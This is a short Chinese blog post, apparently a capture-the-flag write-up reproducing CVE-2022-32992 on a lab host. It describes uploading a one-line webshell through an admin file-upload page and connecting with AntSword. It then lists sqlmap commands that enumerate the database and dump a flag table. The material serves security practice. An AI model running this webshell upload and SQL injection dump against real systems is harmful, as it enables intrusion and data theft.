CVE-2022-32992复现 – 叁玖の小博客

公告

记录自己技术增长过程的博客~

叁玖公告栏 Hacker技术学的再好却无法入侵你的心服务器入侵的再多对你只有Guest, 是我的DDOS造成了你的拒绝服务? 还是我的WebShell再次被你查杀? 你总有防火墙我始终停不掉想提权无奈JSP+MYSQL成为我们的障碍 •᷄ࡇ•᷅

CVE-2022-32992复现

2025-11-27 21:58

|

文章

|

35

85 字

|

1 分钟内

本文最后更新于21 天前，其中的信息可能已经过时，如有错误请发送邮件到1416359402@qq.com

CVE-2022-32992复现

首先进行目录扫描

发现一个/admin/file.php的目录

发现一个上传文件的入口，上传一句话木马，用蚁剑连接，然后根据题目提示找到admin/operations/tax.php

将该代码注释掉，保存之后用sqlmap跑， sqlmap.py -u https://eci-2ze5eib0jobgf6q037eq.cloudeci1.ichunqiu.com/admin/operations/tax.php?id=1 --dbs

python.exe sqlmap.py -u https://eci-2ze5eib0jobgf6q037eq.cloudeci1.ichunqiu.com/admin/operations/tax.php?id=1 -D ctf --tables

python.exe sqlmap.py -u https://eci-2ze5eib0jobgf6q037eq.cloudeci1.ichunqiu.com/admin/operations/tax.php?id=1 -D ctf -T flag --columns

python.exe sqlmap.py -u https://eci-2ze5eib0jobgf6q037eq.cloudeci1.ichunqiu.com/admin/operations/tax.php?id=1 -D ctf -T flag -C flag --dump

文末附加内容

暂无评论

发送评论编辑评论

Markdown

悄悄话

邮件提醒

|´・ω・)ノ

ヾ(≧∇≦*)ゝ

(☆ω☆)

（╯‵□′）╯︵┴─┴

￣﹃￣

(/ω＼)

∠( ᐛ 」∠)＿

(๑•̀ㅁ•́ฅ)

→_→

୧(๑•̀⌄•́๑)૭

٩(ˊᗜˋ*)و

(ノ°ο°)ノ

(´இ皿இ｀)

⌇●﹏●⌇

(ฅ´ω`ฅ)

(╯°A°)╯︵○○○

φ(￣∇￣o)

ヾ(´･･｀｡)ノ"

( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃

(ó﹏ò｡)

Σ(っ °Д °;)っ

( ,,´･ω･)ﾉ"(´っω･｀｡)

╮(╯▽╰)╭

o(*////▽////*)q

＞﹏＜

( ๑´•ω•) "(ㆆᴗㆆ)

颜文字

Emoji

小恐龙

花!